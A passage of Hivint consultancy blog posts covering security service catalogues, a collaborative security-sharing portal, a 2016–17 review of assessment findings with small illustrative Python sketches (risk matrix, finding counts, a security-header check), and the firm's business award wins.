While this is only one example, this scenario is not uncommon across many organisations we work with, across many industry sectors, and it’s only going to get harder. With more organisations moving to an agile development methodology and cloud deployments, ensuring security keeps up with new developments throughout the business is going to be critical to maintaining at least a modicum of security in these businesses.

So, if you’re getting asked to perform a risk assessment the day before go-live (yes, this still happens), you’re doing it wrong.

If you’re routinely performing your assessments of systems and technology within the project lifecycle, you’re doing it wrong.

If you’re engaging with your project teams with policy statements and standards documents, yes, unfortunately you’re also doing it wrong.

Projects are where things — often big things — change in an organisation’s business or technology environment. And where there is change, there is generally a key touch point for the security team. Projects will generally introduce the biggest potential vulnerabilities to your environment, but if there is an opportunity to positively influence the security outcomes at your organisation, it will also be as part of a project.

Once a system is in, it’s too late. If you haven’t already given your input to get a reasonably secure system, the project team will have moved on, their budget will have gone with them, and you’ll be left filling out that risk assessment that sits on some executive’s desk waiting for the risk to be accepted. Tick.

But on the flip-side, if you’re not proactively engaging with project teams and your business to provide solutions for them, you’re getting in the way.

Let’s face it, no project manager wants to read through dozens of pages of security policy and discern the requirements for their project — you may as well have told them through interpretive dance.

So, what’s the solution?

The solution is to look to the mature field of IT Service Management, and the concept of having a Service Catalogue.

A Security Services Catalogue is two things:

Firstly, it is a list of the security and assurance activities offered by the security team, which are generally part of the system development lifecycle. These services may include risk assessments, vulnerability assessments and penetration testing, and code reviews, among others. The important thing is that the services are well defined in terms of their inputs, outputs and process, and the required effort and price, so that the business and the project teams can effectively incorporate them into their budget and schedule.

Secondly, it is a list of the security services already implemented within the organisation and operated by or on behalf of the security team, which have been through your assurance processes and are effectively “approved for use” throughout the organisation. These services would be the implementation of a secure design pattern or blueprint, or form part of one of those blueprints. To get an idea, have a look at the OSA Security Architecture Landscape, or the Mozilla Service Catalog.

Referring quickly to Mozilla’s approach, a good example is their logging/monitoring/SIEM service. Assuming a regulatory and policy requirement for logging and monitoring for all systems throughout your environment, the catalogue entry allows a project team to save money and time by using the standardised service. Of course, using the already implemented tool is also common sense, but writing it down in a catalogue ensures that the security services on offer are communicated to the business, and that the logging and monitoring function for your new system is a known quantity and effective.

The easiest way to describe this approach is “control inheritance” — where a particular implementation of a control is used by a system, that system inherits the characteristics of that control. Think of Active Directory — an access control mechanism. Once you’ve implemented and configured it securely, and it has been evaluated, you have a level of assurance that the control is effective. For all systems then using Active Directory, you have a reasonable level of assurance that they are access controlled, and you can spend your time evaluating other security aspects of the system. So communicate to your organisation that they can use it via your Security Service Catalogue.

And if your Project team wants to get creative? No problem, but anything not in the catalogue needs to go through your full assurance process. That — quite rightly — means risk assessments, control audits, code reviews, penetration tests, and vulnerability scans, which accurately reflects the fact that everything will be much easier for everyone if they pick from the catalogue where possible.

So, how does this work in practice?

Well, firstly, start by defining what level of assurance you need for a system to go into production, or to meet compliance. For example, if you need to meet PCI compliance, you’ll at least have to get your system vulnerability scanned and penetration tested. Create your service catalogue around these, and define business rules for their use and the system development lifecycle stages in which they must be completed.

Secondly, you need to break down your environment into its constituent parts (specifically the security components), review and approve each of those parts, and add them to your Security Service Catalogue. Any system then using those security services as part of its functionality, inherits the security of those services, and you can have a degree of assurance that the system will be secure (at least to the degree that the system is solely comprised of approved components).

The benefits are fourfold:

  • Project teams can simply select the services they want to integrate with, and know that those services meet the requirements of the security policy. No mess, no fuss.
  • Projects go faster, project teams know what the expectations are for them, and aren’t held up by the security inquisitor demanding their resources’ time.
  • Budget predictability. Project teams know the costs which need to be included in their budget up front. They can also choose a security service which is a known-quantity, which means there is a lower chance of a risk eventuating that needs them to pay to change aspects of the system to meet compliance or remediate a vulnerability.
  • You don’t need to check the security of the re-used components used by those projects over and over again.

For example, you might use an on-premise Active Directory instance with which identity and access management is performed; or maybe it’s hosted in Azure. Perhaps you use Okta, a cloud-based SaaS identity and access control service. For logging and monitoring, you might use Splunk or AlienVault as your organisation-wide security monitoring service, or maybe you outsource it to AlertLogic. Whatever. Perform your due diligence, and add it to your catalogue.

Once it’s in your catalogue, you should assess it annually, as part of your business as usual security practices — firstly for risk, secondly at a technical level to validate your risk findings, and finally in a market context to see if there are better controls now available to address the same risk issue.

I’ve been part of a small team building a security certification and accreditation program from scratch, and have seen that the only way to scale the certification process, and ensure sufficient depth of security review across the multitude of systems present in most organisations, is to make sure unnecessary re-hashing of solution reviews is minimised, using these “control inheritance” principles.

Thirdly, develop a Security Requirements Document (SRD) template based upon your Security Services Catalogue. This is where you define the services available and requirements for your project teams, and make the choices really easy for them. Either use the services in the security services catalogue, or comply with all the requirements of the Password Policy, Access Control Policy, Encryption Policy, etc. After a time, your Project Lifecycle will mature, your Security Services will become more standardised and robust, and your life will become significantly easier.

Lastly, get involved with your project teams. Your project teams are not security experts; you are. The sooner you make it easy for them to access the resources and expertise you have available, the sooner they can make the best decisions for your organisation, and the more secure your organisation will be. Make the secure way the easy way, and everyone’s life will be a little more comfortable.


Article by Ben Waters, Senior Security Advisor, Hivint

Security Collaboration — The Problem and Our Solution


Colleagues, the way we are currently approaching information security is broken.

This is especially true with regard to the way the industry currently provides, and consumes, information security consulting services. Starting with Frederick Winslow Taylor’s “Scientific Management” techniques of the 1890s, consulting is fundamentally designed for companies to get targeted specialist advice to allow them to find a competitive advantage and beat the stuffing out of their peers.

But information security is different. It is one of the most wildly inefficient things to try to compete on, which is why most organisations are more than happy to say that they don’t want to compete on security (unless their core business is, actually, security).

Why is it inefficient to compete on security? Here are a couple of reasons:

Customers don’t want you to. Customers quite rightly expect sufficient security everywhere, and want to be able to go to the florist with the best flowers, or the best priced flowers, rather than having to figure out whether that particular florist is more or less secure than the other one.

No individual organisation can afford to solve the problem. With so much shared infrastructure, so many suppliers and business partners, and almost no ability to recoup the costs invested in security, it is simply not cost-viable to throw the amount of money really needed at the problem. (Which, incidentally, is why we keep going around in circles saying that budgets aren’t high enough — they aren’t, if we keep doing things the way we’re currently doing things.)

Some examples of how our current approach is failing us:

We are wasting money on information security governance, risk and compliance

There are 81 credit unions listed on the APRA website as Authorised Deposit-Taking Institutions. According to the ABS, in June 2013 (the most recent data), there were 77 ISPs in Australia with over 1,000 subscribers. The thought that these 81 credit unions would independently be developing their own security and compliance processes around security, and that the 77 ISPs are doing the same, despite the fact that the vast majority of their risks and requirements are going to be identical to those of their peers, is frightening.

The wasted investment in our current approach to information security governance is extreme. Five or so years ago, when companies started realising that they needed a social media security policy, hundreds of organisations engaged hundreds of consultants, to write hundreds of social media security policies, at an economy-wide cost of hundreds of thousands, if not millions, of dollars. That. Is. Crazy.

We need to go beyond “not competing” and cross the bridge to “collaboration”. Genuine, real, sharing of information and collaboration to make everyone more secure.

We are wasting money when getting technical security services

As a technical example, I met recently with a hospital where we will be doing some penetration testing. We will be testing one of their off-the-shelf clinical information system software packages. The software package is enormous — literally dozens of different user privilege levels, dozens of system inter-connections, and dozens of modules and functions. It would easily take a team of consultants months, if not a year or more, to test the whole thing thoroughly. No hospital is going to have a budget to cover that (and really, they shouldn’t have to), so rather than the 500 days of testing that would be comprehensive, we will do 10 days of testing and find as much as we can.

But as this is an off-the-shelf system, used by hundreds of hospitals around the world, there are no doubt dozens, maybe even hundreds, of the same tests happening against that same system this year. Maybe there are 100 distinct tests, each of 10 days’ duration being done. That’s 1,000 days of testing — or more than enough to provide comprehensive coverage of the system. But instead, everyone is getting a 10 day test done, and we are all worse off for it. The hospitals have insecure systems, and we — as potential patients and users of the system — wear the risk of it.

The system is broken. There needs to be collaboration. Nobody wants a competitive advantage here. Nobody can get a competitive advantage here.

So what do we do about it?

There is a better way, and Hivint is building a business and a system that supports it. This system is called “The Colony”.

It is an implementation of what we’re calling “Community Driven Security”. This isn’t crowd-sourcing but involves sharing information within communities of interest who are experiencing common challenges.

The model provides benefits to the industry both for the companies who today are getting consulting services, and for the companies who can’t afford them:

Making consulting projects cheaper the first time they are done. If a client is willing to share the output of a project (that has, of course, been de-sensitised and de-identified) then we can reduce the cost of that consulting project by effectively “buying back” the IP being created, in order to re-use it. Clients get the same services they always get; and the sharing of the information will have no impact on their security or competitive position. So why not share it and pocket the savings?

Making that material available to the community and offering an immediate return on investment. Through our portal — being launched in June — for a monthly fee of a few hundred dollars, subscribers will be able to get access to all of that content. That means that for a few hundred dollars a month, a subscriber will be able to access the output from hundreds of thousands of dollars worth of projects, every month.

Making subsequent consulting projects cheaper and faster. Once we’ve completed a certain project type — say, developing a suite of incident response scenarios and quick reference guides — then the next organisation that needs a similar project can start from that and pay only for the changes required (and if those changes improve the core resources, those changes will flow through to the portal too).

Identifying GRC “Zero Days”. Someone, somewhere, first identified that organisations needed a social media security policy, and got one developed. There was probably a period of months, or even years, between that point and when it became ubiquitous. Through the portal, organisations that haven’t even contemplated such a need will be able to see that it has been identified and delivered, and if they want to address the risk before it materialises for them, they have the chance. And there is no incremental cost over membership to the portal to grab it and use it.

Supporting crowd-funding of projects. The portal will provide the ability for organisations to effectively ‘crowd fund’ technical security assessments against software or hardware that is used by multiple organisations. The maths is pretty simple: if two organisations are each looking at spending $30,000 to test System X, getting 15 days of testing for that investment, then by each putting $20,000 into a central pool to test System X, they’ll get 20 days of testing and save $10,000 each. More testing, for lower cost, resulting in better security. Everyone wins.
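For those who like to see the working, here is that arithmetic as a minimal Python sketch. The day rate is implied by the figures above ($30,000 buys 15 days); the function itself is ours, for illustration only:

```python
# Back-of-the-envelope maths for pooled ("crowd-funded") testing.
# The $2,000 day rate is implied by the figures above; all other
# numbers are illustrative.
DAY_RATE = 30_000 / 15  # dollars per day of testing

def pooled_outcome(contribution_per_org: float, num_orgs: int) -> tuple:
    """Return (days of testing bought, saving per org vs. a solo $30,000 test)."""
    pool = contribution_per_org * num_orgs
    days = pool / DAY_RATE
    saving_per_org = 30_000 - contribution_per_org
    return days, saving_per_org

days, saving = pooled_outcome(20_000, 2)
print(f"{days:.0f} days of testing, ${saving:,.0f} saved per organisation")
# -> 20 days of testing, $10,000 saved per organisation
```

The saving scales with the number of participants: the more organisations who contribute to the pool, the more testing it buys for each of them.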

What else is going in to the portal?

We have a roadmap that stretches well into the future. We will be including Threat Intelligence, Breach Intelligence, Managed Security Analytics, the ability to interact with our consultants and ask either private or public questions, the ability to share resources within communities of interest, project management and scheduling, and a lot more. Version 1 will be released in June 2015 and will include the resource portal (i.e., the documents from our consulting engagements), Threat Intelligence and Breach Intelligence, plus the ability to interact with our consultants and ask private or public questions.

“Everyone” can’t win. Who loses?

The only people who might lose out of this are security consultants. But even there, we don’t think that will be the case. It is our belief that the market is supply-side constrained — in other words, we believe we are going to be massively increasing the ‘output’ from the economy-wide consulting investment in information security; but we don’t expect companies will spend less (they’ll just do more, achieving better security maturity and raising the bar for everyone).

So who loses? Hopefully, the bad guys, because the baseline of security across the economy gets better and it costs them more to break in.

Is there a precedent for this?

The NSW Government Digital Information Security Policy has as a Core Requirement, and a Minimum Control, that “a collaborative approach to information security, facilitated by the sharing of information security experience and knowledge, must be maintained.”

A lot of collaboration on security so far has been about securing the collaboration process itself. For example, health organisations collaborating to ensure that health data flowing between them is secure throughout that collaborative process. But we believe collaboration needs to be broader: not just securing the collaborative footprint, but securing the entirety of each other’s organisations.

Banks and others have for a long time had informal networks for sharing threat information, and the CISOs of banks regularly get together and share notes. The CISOs of global stock exchanges regularly get together similarly. There’s even a forum called ANZPIT, the Australian and New Zealand Parliamentary IT forum, for the IT managers of various state and federal Parliaments to come together and share information across all areas of IT. But in almost all of these cases, while the meetings and the discussions occur, the on-the-ground sharing of detailed resources happens much less.

The Trusted Information Sharing Network (TISN) has worked to share — and in many cases develop — in-depth resources for information security. (In our past lives, we wrote many of them.) But these are $50K-100K endeavours per report, generally limited to 2 or 3 reports per year, and generally take a fairly heavyweight approach to the topic at hand.

Our belief is that while “the 1%” of attacks — the APTs from China — get all the media love, we can do a lot of good by helping organisations with very practical and pragmatic support to address the 99% of attacks that aren’t State-sponsored zero-days. Templates, guidelines, lists of risks, sample documents, and other highly practical material are the core of what organisations really need.

What if a project is really, really sensitive?

Once project outcomes are de-identified and de-sensitised, they’re often still very valuable to others, and not really of any consequence to the originating company. If you’re worried about it, you can review the resources before they get published.

So how does it work?

  1. You give us a problem; we’ll scope it, quote it, and deliver it with expert consultants. (This part of the experience is the same as your current consulting engagements.)
  2. We offer a reduced fee for service delivery (percentage reduction dependent on re-usability of output).
  3. Created resources, documents, and de-identified findings become part of our portal for community benefit.

Great. Where to from here?

There are two things we need right now:

  • Consulting engagements that drive the content creation for the portal. Give us the chance to pitch our services for your information security consulting projects. We’ve got a great team, the costs are lower, and you’ll also be helping our vision of “community driven security” become a reality. Get in touch and tell us about your requirements to see how we can help.
  • Sign up for the portal (you’ve done this bit!) and get involved: send us some questions, download some documents, subscribe if you find it useful.

And of course we’d welcome any thoughts or input. We are investing a lot into this, and are excited about the possibilities it is going to create.


Article by Nick Ellsmore, Chief Apiarist, Hivint

Hivint’s 2016–17 Tech Year in Review

Over the course of the 2016–17 financial year, Hivint completed 117 technical security assessments for our clients, ranging from source code reviews through to whole-of-organisation penetration tests.

One of our driving values is collaboration, so in this spirit, we wish to share statistics and observations about our year.

We hope that by sharing this information, we’ll provide an insight into the security assurance activities delivered by an Australian cyber-security consultancy. We also hope that over time, we’ll be able to identify and present trends in the evolving nature of assurance activities — supported by clear facts and figures as opposed to general observations.

Engagements

Our security assessments were delivered to Australian and international clients across a wide range of industries, with the following chart providing the breakdown across industries.


It’s clear that our main clients for technical security assurance activities are positioned within the Finance, Government and Technology sectors, with approximately twice as many engagements performed in each of these sectors as in any of the others. We believe that this can be attributed to:

  • The Finance industry being one of the more ‘security mature’ industries, and one that demands a high level of security assurance because it is a common attack target with the potential for direct financial gain
  • The Technology industry maintaining a greater overall understanding of technical security risks and (similar to the Finance industry) demanding a high level of security assurance
  • The Government sector, through its sheer size and its need to obtain general periodic security assurance

The engagements completed varied greatly in work effort, target, and type of assessment performed. The 117 assessments undertaken ranged from short, single-day vulnerability assessments (intended to provide a limited, final quality assurance check on a new system) to multi-month, organisation-wide penetration testing and vulnerability assessment activities. Engagements included configuration reviews, testing of hardware / IoT devices, mobile and web applications, wireless and network infrastructure, source code reviews and more, with web application testing being the most common assessment type (the primary focus of 50 of the 117 assessments completed).

Findings

Through the 117 assessments undertaken, a total of 720 findings were identified. Findings which were deemed to not present a security risk (i.e. informational findings) are not included in this total.

To assess the risk of our security findings, Hivint employs an ISO 31000 aligned risk assessment framework, with common likelihood, impact and overall risk criteria applied across engagements. The table below provides a breakdown of the number and severity of findings.
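By way of illustration only, here is a minimal sketch of how such a likelihood and impact lookup can work. The likelihood and impact labels below are hypothetical stand-ins, not the actual criteria from our framework; only the Extreme-to-Very-Low severity scale matches the findings that follow.

```python
# Illustrative sketch of an ISO 31000 style likelihood x impact lookup.
# Likelihood/impact labels are hypothetical; severity labels follow the
# Extreme-to-Very-Low scale used in the findings breakdown.
LIKELIHOOD = ["Rare", "Unlikely", "Possible", "Likely", "Almost Certain"]
IMPACT = ["Insignificant", "Minor", "Moderate", "Major", "Severe"]

SEVERITY = [
    # Insignificant  Minor       Moderate   Major      Severe
    ["Very Low",    "Very Low", "Low",     "Medium",  "Medium"],   # Rare
    ["Very Low",    "Low",      "Low",     "Medium",  "High"],     # Unlikely
    ["Low",         "Low",      "Medium",  "High",    "High"],     # Possible
    ["Low",         "Medium",   "High",    "High",    "Extreme"],  # Likely
    ["Medium",      "Medium",   "High",    "Extreme", "Extreme"],  # Almost Certain
]

def risk_rating(likelihood: str, impact: str) -> str:
    """Map a likelihood/impact pair to an overall risk severity."""
    return SEVERITY[LIKELIHOOD.index(likelihood)][IMPACT.index(impact)]

print(risk_rating("Possible", "Major"))  # -> High
```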


The below chart provides the breakdown of the number of findings (from the Extreme down to Very Low risk severity) for each of the different industries.


Based on these ‘raw’ numbers, it’s clear that the majority of findings are rated as Low risk, with the number of findings tapering off as the risk severity increases. It is acknowledged, however, that these ‘raw’ numbers may be skewed by the number and type of engagements performed for each industry — if the Technology sector underwent the most engagements, it seems reasonable that it would have the highest number of findings. To reduce this potential skew, the following chart averages the number of findings (for each risk rating) across the number of engagements completed for all clients in that industry sector.
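Here is a minimal sketch of that normalisation, using placeholder numbers rather than our actual data:

```python
# Sketch of the normalisation: raw finding counts per industry are divided
# by the number of engagements in that industry. All numbers are placeholders.
findings_by_industry = {
    "Finance":    {"High": 10, "Medium": 40, "Low": 120},
    "Technology": {"High": 8,  "Medium": 35, "Low": 110},
    "Retail":     {"High": 12, "Medium": 10, "Low": 9},
}
engagements_by_industry = {"Finance": 30, "Technology": 28, "Retail": 6}

for industry, counts in findings_by_industry.items():
    engagements = engagements_by_industry[industry]
    averages = {rating: count / engagements for rating, count in counts.items()}
    ratio = averages["Low"] / averages["High"]  # the Low:High ratio discussed below
    print(industry, {k: round(v, 1) for k, v in averages.items()},
          f"Low:High ~ {ratio:.1f}:1")
```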


With this normalised data, all industry sectors (except one) followed a fairly predictable pattern of having higher numbers of lower-risk issues and lower numbers of high-risk issues. More mature industry sectors (such as Financial Services and Technology) showed a much more rapid drop-off as the risk of the issues increased; that is, for these sectors, High risk issues presented at a much lower rate as a proportion of all issues, with the ratio of Low:High issues in Finance, Technology, Legal and some others being roughly 10–20:1. This contrasts with Sports, which is closer to 2:1.

We interpret this as a reflection of the focus over recent years on closing off the higher risk issues in industries such as Finance and Technology, and the higher frequency with which tests have been completed against these systems.

A clear outlier in the total data set is the Retail sector, which presented a higher average number of High risks than Low risks. Whilst in general we believe that the Retail sector doesn’t have the same security maturity as sectors such as Finance and Technology, we expect that this level of High risk findings is an anomaly, and we will be interested to review next year’s data to identify whether a similar ratio of Low:High findings is present.

Monthly Breakdown

Across the year, there is a clear set of peaks in the number of security assessment engagements, and consequently in the number of findings identified each month. The below chart presents the number of engagements and findings per month across the 2016–17 period.


The data in the above chart aligns with our experience of working in this industry over more than 10 years. The peak periods are the lead-up to the end of the financial year and the end of the calendar year, which we attribute primarily to:

  • The need to complete projects prior to the end of a forecast cycle (which in Australia is largely prior to the Christmas holiday period — “I need the project in by Christmas”), and
  • The need to expend budget prior to the end of a financial cycle (which in Australia is primarily end of June).

We will be interested to see if the number of engagements from approximately November 2017 through to March / April 2018 increases as a result of entities seeking increased security assurance prior to the mandatory data breach notification[i] requirements coming into effect in February 2018 (applicable to entities subject to the Privacy Act 1988).

Common Weaknesses

To categorise our findings, we follow the Web Application Security Consortium (WASC) Threat Classifications[ii] where possible. This allows us to remain consistent between engagements, and provides for a transparent view of categorisation.

Out of 720 findings across WASC categories, the top 10 WASC categories comprised 88% of all findings. The below chart visualises the top 10 weakness categories that we found across the year.
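For transparency, here is a minimal sketch of how that share is derived from categorised findings. The category counts below are placeholders, not our real data set of 720 findings:

```python
# Sketch of deriving the top-10 share from categorised findings.
# One WASC category string per finding; counts here are placeholders.
from collections import Counter

wasc_categories = (
    ["Application Misconfiguration"] * 150
    + ["Insufficient Authentication"] * 120
    + ["Improper Input Handling"] * 90
    # ...and so on, up to 720 entries in total
)

counts = Counter(wasc_categories)
top10_total = sum(n for _, n in counts.most_common(10))
share = top10_total / sum(counts.values())
print(f"Top 10 categories account for {share:.0%} of findings")
```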


The most common type of risk found was Application Misconfiguration, which is a fairly wide issue category — usually encountered when an application is not configured with security in mind — and includes issues such as a lack of security headers, or default files disclosing configuration details and application version information. The second most common was Insufficient Authentication, which can be seen when issues such as default credentials are in use, or when the application suffers from username enumeration.
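As a concrete illustration of the first category, missing security headers can be flagged with a few lines of Python. This is a minimal sketch under our own assumptions: the header list is illustrative rather than exhaustive, and the third-party ‘requests’ package is assumed to be available.

```python
# Sketch: flag common security headers missing from an HTTP response.
# The header list is illustrative, not exhaustive. Requires the
# third-party 'requests' package.
import requests

EXPECTED_HEADERS = [
    "Content-Security-Policy",
    "Strict-Transport-Security",
    "X-Content-Type-Options",
    "X-Frame-Options",
]

def missing_security_headers(url: str) -> list:
    """Return the expected security headers absent from the response."""
    response = requests.get(url, timeout=10)
    return [h for h in EXPECTED_HEADERS if h not in response.headers]

print(missing_security_headers("https://example.com"))
```

In a real assessment this is only a starting point: the presence of a header says nothing about whether its policy is actually effective.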

Interestingly, the majority of findings relate to the insecure configuration of the target system (application, operating system, network device, etc.), or to a failure to keep the system patched against known security issues. In a large number of our assessments, the targets are off-the-shelf systems that do not include any custom development by the implementing organisation, only configuration. Whilst it is recognised that some of these security findings are outside of the control of the implementing organisation (vulnerabilities in the software itself), in the majority of instances, if the implementing organisation were to:

  1. Follow vendor implementation guidance for secure configuration of the system (as well as any underlying infrastructure), and
  2. Keep the system patched,

then many of these findings would not exist.

Conclusion

We are clearly not yet at the point where security is sufficiently ‘baked in’ to solutions that hands-on security assurance activities, through testing and analysis of systems, are unnecessary.

Anecdotally, we do see that organisations which invest in security earlier in the lifecycle (e.g. defining solution security requirements, performing security threat modelling, undertaking security design reviews and code assessments) see fewer and less severe findings when implementation testing (such as a vulnerability assessment) is performed against the solution. Those that first introduce security into the project lifecycle through a vulnerability assessment a week before go-live are typically the ones with the greatest number (and highest severity) of findings.

Additionally, as the industry progresses to the use of more and more commoditised services (e.g. Software as a Service) and the number of bespoke applications reduces as a percentage of all deployments, we expect that security ‘misconfigurations’ will increase as a percentage of overall findings due to a reduction in unique security vulnerabilities. We also hope that such a migration will reduce the overall number of findings from our engagements, as an increasing number of ‘secure by default’ settings become ingrained into offerings.

Finally, we plan to keep an eye on developments across industry and relevant legislation, such as mandatory breach reporting in Australia and the impacts on Australian entities stemming from the EU’s General Data Protection Regulation. We expect that these macro-level changes will filter through to the number and types of security activities (including security assessments) that are executed, and it will be interesting to see if next year’s data set indicates any impact from these types of initiatives.

We hope that the data presented here has provided you with some useful insight into Hivint’s 2016–17 technical assessment activities. If you would like to see more material that we’ve shared from our engagements — such as security test cases, cheat sheets, common security findings and more — sign up for a free subscription to our collaboration portal at https://portal.securitycolony.com/register.


Contributors: Aaron Doggett, Sam Reid, Cameron Stokes, and Jordan Sinclair


[i] Introduced through the Privacy Amendment (Notifiable Data Breaches) Act 2017 and defined as the Notifiable Data Breaches scheme. Additional details here: https://www.oaic.gov.au/engage-with-us/consultations/notifiable-data-breaches/

[ii] http://projects.webappsec.org/w/page/13246978/Threat%20Classification

Hivint in the Telstra Business Awards


Hivint entered the Telstra Business Awards in early 2017 and, after a rigorous selection process, won the Victorian New Business Award and the Victorian Business of the Year.

Check out the acceptance speeches below:

Craig and Nick accepting the Telstra Victorian New Business Award.

Craig and Nick accepting the Telstra Victorian Business of the Year Award.

Some more photos from the evening, with hundreds of passionate people from all types of businesses in attendance.

The Hivint team in attendance

Craig tearing up (just a little)

Craig Searle’s heartfelt acceptance speech

Next up are the National Telstra Business Awards, where we’ll be competing against some of Australia’s highest-performing businesses. See you there!